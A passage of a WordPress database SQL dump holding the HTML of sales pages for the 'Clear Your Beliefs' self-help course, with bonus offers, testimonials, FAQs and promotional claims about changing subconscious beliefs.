with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:02:44', '2014-06-18 01:02:44', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(952, 2, '2014-06-17 18:28:28', '2014-06-17 23:28:28', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nLearn to change your beliefs, and your\r\npossibilities will be unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: 